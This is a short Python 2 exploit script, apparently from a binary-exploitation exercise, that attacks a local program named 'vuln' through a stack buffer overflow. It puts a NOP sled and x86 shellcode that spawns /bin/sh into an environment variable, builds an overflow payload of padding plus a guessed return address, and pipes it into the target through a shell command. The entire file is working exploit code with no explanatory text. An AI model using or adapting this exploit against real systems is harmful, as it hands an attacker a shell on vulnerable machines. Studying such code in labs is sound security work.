#!/usr/bin/env python

import struct
import os
import sys
import subprocess

def write_to_file(filename, data):
    f = open(filename, "w")
    f.write(data)
    f.close()

nop_padding_len = 128
NOP = "\x90"
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
shellcode_payload = NOP*nop_padding_len + shellcode
write_to_file("shellcode_payload", shellcode_payload)

# Start from address and create overflow_payload to jump to that address.
# Increment address by step bytes and retry. For each payload launch
# executable through os.system().
step = nop_padding_len / 2
start_address=0xbfffff80

for offset_index in range(0, 1):
    # Create overflow payload.
    jump_address = start_address + step*offset_index
    overflow_payload = 20*"A" + struct.pack("<I", jump_address) + "\n"
    write_to_file("overflow_payload", overflow_payload)

    # Print address and launch executable.
    print >> sys.stderr, "using address 0x%08x" % (jump_address)
    subprocess.call("cat overflow_payload - | SHELLCODE=$(cat shellcode_payload) ./vuln", shell=True)